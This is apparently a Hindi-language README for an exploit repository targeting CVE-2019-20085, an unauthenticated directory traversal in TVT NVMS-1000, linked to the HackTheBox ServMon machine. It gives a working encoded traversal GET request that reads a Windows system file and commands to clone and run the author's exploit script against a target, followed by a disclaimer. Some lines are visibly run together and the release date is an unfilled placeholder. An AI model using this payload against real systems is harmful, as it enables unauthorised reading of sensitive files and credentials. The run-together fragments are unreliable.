
हैकदबॉक्स सर्वमॉन मशीन के लिए उपयोग किया जाने वाला रिपॉजिटरी
लेखक: Z3R0 CVE: CVE-2019-20085 लक्ष्य: TVT NVMS-1000 (सभी ज्ञात संस्करण पैच से पहले) कमजोरी का प्रकार: अप्रमाणित डायरेक्टरी ट्रैवर्सल तिथि: [Insert Your Release Date]
TVT के NVMS-1000 सॉफ़्टवेयर में अपने वेब सर्वर घटक में एक डायरेक्टरी ट्रैवर्सल कमजोरी है। /.. अनुक्रमों का उपयोग करके विशेष रूप से तैयार GET अनुरोध भेजकर, एक अप्रमाणित हमलावर अंतर्निहित OS पर मनमानी फ़ाइलों तक पहुँच सकता है, जिसमें संवेदनशील कॉन्फ़िगरेशन फ़ाइलें, पासवर्ड हैश या सिस्टम कुंजियाँ शामिल हैं।
यह एक्सप्लॉइट NVMS-1000 पर चलने वाले HTTP सर्वर में कमजोर फ़ाइल पथ समाधान का दुरुपयोग करता है। किसी प्रमाणीकरण की आवश्यकता नहीं है। एक दूरस्थ हमलावर सेवा उपयोगकर्ता के लिए सुलभ किसी भी फ़ाइल को पढ़ सकता है।
GET /..%5C..%5C..%5C..%5Cwindows%5Cwin.ini HTTP/1.1
Host: <target-ip>:80
C:\Windows\win.ini)requests मॉड्यूल (pip install requests)git clone https://github.com/Z3R0-0x30/CVE-2019-20085.git
cd CVE-2019-20085
python3 exploit.py http://domain.local/ ../../windows/win.ini win.ini"
यह एक्सप्लॉइट केवल शैक्षिक और अधिकृत सुरक्षा अनुसंधान उद्देश्यों के लिए जारी किया गया है। लेखक Z3R0 किसी भी दुरुपयोग या अनधिकृत पहुँच के लिए जिम्मेदार नहीं है। सिस्टम का परीक्षण करने से पहले हमेशा उचित प्राधिकरण प्राप्त करें।